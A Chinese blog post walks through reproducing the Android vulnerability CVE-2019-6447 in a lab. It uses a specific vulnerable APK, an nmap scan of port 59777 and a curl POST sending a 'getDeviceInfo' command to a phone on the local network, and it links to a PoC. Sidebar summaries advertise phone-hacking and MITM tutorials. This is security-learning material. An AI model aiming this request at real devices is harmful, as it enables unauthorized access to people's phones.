漏洞复现

最新推荐文章于 2025-09-14 06:03:56 发布

axuhongbo

最新推荐文章于 2025-09-14 06:03:56 发布

阅读量1.6k

点赞数

CC 4.0 BY-SA版权

分类专栏：网络安全文章标签：漏洞安卓复现 CVE 2019-6447

本文链接：https://blog.csdn.net/axuhongbo/article/details/109861330

网络安全专栏收录该内容

1 篇文章

订阅专栏

本文介绍如何复现安卓漏洞CVE-2019-6447，并提供特定版本的APK下载链接。通过Kali虚拟机及nmap扫描目标端口状态，使用curl命令完成攻击过程。

本文为的安卓漏洞 CVE-2019-6447 复现
用到的apk下载链接：
APK下载链接

注意一定要用此版本的apk，其他版本的apk可能不包含此漏洞。

1 首先打开kali 虚拟机，然后一台手机1开热点，另一台手机2安装apk，打开在app界面，查看手机2的ip地址。
2 用nmap命令指定扫描59777端口查看是否打开，
若打开则显示open字样。
3 接着直接执行下方的命令。
或者下载POC源码，下载POC执行所需的环境requirements。
执行攻击命令，完成攻击。

curl --header "Content-Type: application/json" --request POST --data "{\"command\":getDeviceInfo}" http://192.168.43.251:59777 -vvv

Github-POC源码

参考链接

POC
参考链接1
参考链接2

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

axuhongbo

关注关注

0
点赞
踩
4

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

记录安卓，IOS安装kali的办法

weixin_48465105的博客

11-08

1万+

纯做记录，不要用此技术做违法的事情，仅供研究，概不负责一年前的小日记，照抄过来记录一下。现在安卓有一个ZeroTermux更好用，可以傻瓜式安装kali，三星S10完美运行nmap等，下面的方法推荐Linux deploy。有兴趣的朋友可以交流首先，你需要的装备： 1.一部手机or一部平板（反正便于携带的）最好是安卓（ios有一定限制，其实也可以，但是步骤长，还需要注册海外ID，最讨厌的是IOS不方便搭梯子，你懂的） 2.你的装备必须root（不懂root，可以百度一下，手机连接电脑上下个软件roo

Kali初讲——非局域网下入侵手机

萌蠢骇客

06-04

7379

kali linux使用反弹shell入侵手机全流程——使用本教程请遵循网络安全法。

参与评论您还未登录，请先登录后发表或查看评论

漏洞解析--文件包含漏洞（含漏洞复现）

最新发布

weixin_55010563的博客

09-14

743

文件包含漏洞是一种安全风险，当程序包含用户可控路径的文件时，攻击者可利用此漏洞读取敏感信息或执行恶意代码。漏洞分为本地文件包含(LFI)和远程文件包含(RFI)，核心风险在于用户可控制被包含文件的路径。检测方法包括黑盒测试和代码审计，危害包括信息泄露和代码执行。修复建议使用白名单验证路径、禁用远程包含、限制协议访问。常见的绕过技巧有编码混淆、%00截断等。文章还提供了Windows/Linux的敏感路径列表、PHP协议用法说明，并以通达OA11.2为例演示了日志注入实现RCE的复现过程，强调该技术仅限合法测

metasploit、msfvenom生成木马入侵电脑及手机

爱我非你莫属的博客

10-08

3712

简介 msfvenom msfvenom a Metasploit standalone payload generator，Also a replacement for msfpayload and msfencode.是用来生成后门的软件查看所有–payload的模块 msfvenom -l payloads 文件后缀名-f的格式 msfvenom --help-formats metasploit Metasploit Framework(MSF)是一款开源安全漏洞检测工具，附带数千个

Kali Linux 网络安全渗透测试

06-02

为什么学网络安全？1. 市场巨大每年各安全厂商收入高达400亿左右，随着5G的发展，万物互联时代，市场将进一步扩大。2. 薪资高网安人才的匮乏，用人开出招聘薪资往往高于求职者的预期。3. 靠能力说话在网络安全专业，专业技能竞争力要远高于学历本身。在网安专业只看能力不看学历也成了大家公认的原则。网络安全未来10年的发展前景现代人的生活与网络息息相关，个人、企业信息的安全显示尤为重要，2018年报告的信息安全事件比2017年有所增加，一年几千万次。应对网络安全挑战，已越来越被重视。不管你是否从事网络安全行业相关工作，信息安全都显得越来越重要。注意：视频教学内容仅用于网络安全渗透测试。其他行为，自己承担相应的责任，与作者无关。

windows|kali安装charles

深耕网络安全领域，聚焦护网行动（HW）、渗透测试、等级保护（等保）、CTF 竞赛四大核心方向，提供技术干货、实战经验与行业洞察。

03-02

1220

【代码】kali安装charles。

kali中间人攻击----盗取账号和密码

热门推荐

baidu_38803985的博客

04-10

1万+

声明: 本案例仅供个实验使用, 并不作任何违法违纪等不正当，请遵守约定。 1.原理解析在局域网内通信都是通过交换机及路由器连接外部网络的, 对于局域网内大家都使用的一个协议为ARP协议, 这个协议很奇特因为它是用来标定局域网内每台主机的MAC地址使用的, 还有就是ARP协议也是用来规定网关的。在我们下面要做的实验的过程中, kali系统会时刻向选定的机器发送“我是网关”, 这样堵塞了真...

实战 | 记一次对iphone手机游戏的渗透测试

leah126的博客

02-10

1970

各位师傅好，我是女鬼水妖，某高校大二学生，热爱网络安全，主攻红队方向。账号密码就是为了获取 _session，同时 _session 是固定不变的所以就可以说这个 _session 可以绕过来进行。再加上我本来是比较喜欢打游戏的，经过某公司渗透授权，对此游戏进行渗透测试。1. 移动端游戏是比较少进行渗透，我相信漏洞也是很多的，师傅们可以自己去挖掘。我们的目的不是登录其他用户的账号，我们是看是否能直接进行对数据库进行读取。先进行登录，发现它居然是用明文传输，没有经过其他加密算法进行加密。

苹果系统新致命漏洞，黑客可以随意控制您的手机设备

w3cschools的博客

04-21

1万+

国内知名黑客组织东方联盟的安全研究人员发现了苹果一个新的漏洞，可能会让黑客在您不知情的情况下访问您的iPhone和iPad。一旦用户授权他们的设备与黑客连接到同一个Wi-Fi网络，他们称这种漏洞为“信任劫持”，从而允许您无线管理iOS设备。东方联盟创始人兼黑客教父郭盛华：“一旦建立起这种信任关系，一切皆有可能，它引入了一种新的攻击媒介。”第一步需要您在安装完成后通过USB电缆将设备连接到计算机，但...

kali Linux 黑安卓,黑苹果不再孤单，iPhone成功运行“黑安卓”（附教程）

weixin_28752415的博客

05-13

3848

众多周知，和安卓的众多旗舰手机相比，iPhone的优势除了拥有强大的硬件之外，更重要的便是一整套完整的iOS生态系统，毕竟和安卓相比，iOS系统显得稳定，而且易于管理，这也是众多消费者不愿意更换iPhone以外手机的原因。那么换个思路，如果往iPhone手机里面导入安卓的操作系统，那又是一种怎样的体验呢？来自国外的一个团队近期发布了一段视频，在视频中，他们成功地突破了iPhone的安全保护，同时将...

ios高版本app成功砸壳之kali使用frida-ios-dump砸壳

来到了学渣的博客

01-16

4150

前言从事渗透这个行业，我相信百分之九十的人都是安服仔，安服仔就是要什么都懂一点点但是又不精通，碰到了困难也没办法从底层的原理去解决，但是为了能在这个社会混上一口饭，安服仔永远都是那种最拼命的人，那种干劲是无敌的！所以凭借着打不死的心态，解决了所谓"不可能解决的问题"。所以可以相信我，跟着我的操作，保证你能成功砸的高版本ios app的ipa文件 1、越狱的ios手机配置好对应的frida版本 2、kali或者linux服务器，对应的egg文件放置在用户的目录下(解决python安装frida模块问题

kali局域网嗅探

jasdhasd的博客

03-23

5569

渗透测试

基于kali的一次无线渗透测试

qq_51913390的博客

06-21

4505

首先对目标靶机所在无线接入点进行渗透，加入目标靶机所在局域网，然后使用ARP欺骗攻击，DNS劫持等进行局域网渗透。流程图如下图1-1所示： 1.：是一个抓包工具，提供airodump-ng、airepaly-ng、aircrack-ng等三个工具，分别用于探测附近的无线信息详细信息，解除认证攻击和无线密文离线破解。 2.：提供arpspoof工具进行arp欺骗攻击 3. ：用于发现局域网存活的主机及其操作系统等信息 4. ：用于图片嗅探 5. ：提供Web服务用于DNS劫持 6. ：进行arp欺骗及DN

kali linux怎么入侵手机,Kali Linux-Metasploit入侵Android手机

weixin_32821251的博客

05-13

2405

kali Linux-Metasploit入侵Android手机写此文章的初衷是为了告诉哪些喜欢蹭别人wifi的人，这样的做法是很危险的哦!Kali Linux IP地址192.168.1.101(虚拟机设置桥接模式)同一局域网内安卓手机一部创建一个后门程序创建的此后门程序我们设置是通过80端口接受默认的kali安装好之后是没有任何端口打开的这里我们需要开启80端口为了方便我们直接安装apa...